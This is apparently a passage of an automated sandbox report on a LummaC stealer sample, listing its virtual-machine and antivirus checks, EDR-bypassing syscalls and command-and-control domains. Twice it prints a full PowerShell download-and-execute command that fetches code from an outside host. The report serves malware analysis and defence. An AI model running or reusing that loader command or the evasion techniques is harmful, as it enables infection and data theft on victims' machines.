              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\@Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\@Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeAPI/Special instruction interceptor: Address: 6C4B7C44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeRDTSC instruction interceptor: First address: 6C4BF3E1 second address: 6C4BF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeRDTSC instruction interceptor: First address: 6C4BF3FD second address: 6C4BF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FE874F7E885h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FE874F7E910h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7400Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2429Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\Desktop\@Setup.exe TID: 2640Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep count: 7400 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep count: 2429 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000004.00000002.2093206402.0000000007925000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllScheduler-0000
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: @Setup.exe, 00000000.00000002.2283852591.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259753444.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1843769815.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2886949996.00000000014C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000002.2327244287.00000000014CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000002.2327244287.00000000014F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0War&Prod_VMware_SATA_CD00#4&22
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\@Setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F0351 mov edx, dword ptr fs:[00000030h]0_2_008F0351
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F0911 mov eax, dword ptr fs:[00000030h]0_2_008F0911
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F0CC1 mov eax, dword ptr fs:[00000030h]0_2_008F0CC1
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F0F61 mov eax, dword ptr fs:[00000030h]0_2_008F0F61
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F0F60 mov eax, dword ptr fs:[00000030h]0_2_008F0F60
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_008C58BB mov eax, dword ptr fs:[00000030h]37_2_008C58BB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeNtQuerySystemInformation: Direct from: 0x76EF7B2E
              LummaC encrypted strings found
              Source: @Setup.exeString found in binary or memory: hummskitnj.buzz
              Source: @Setup.exeString found in binary or memory: appliacnesot.buzz
              Source: @Setup.exeString found in binary or memory: cashfuzysao.buzz
              Source: @Setup.exeString found in binary or memory: inherineau.buzz
              Source: @Setup.exeString found in binary or memory: screwamusresz.buzz
              Source: @Setup.exeString found in binary or memory: rebuildeso.buzz
              Source: @Setup.exeString found in binary or memory: scentniej.buzz
              Source: @Setup.exeString found in binary or memory: laborersquei.click
              Source: @Setup.exeString found in binary or memory: prisonyfork.buzz
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ?
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ?Jump to behavior
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: TrayNotifyWndShell_TrayWndU
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: Shell_TrayWnd
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: SHELL_TRAYWND
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: Shell_TrayWndtooltips_class32SV
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: Shell_TrayWndU
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: PROGMAN
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drBinary or memory string: SHELL_TRAYWNDU
              Source: C:\Users\user\Desktop\@Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
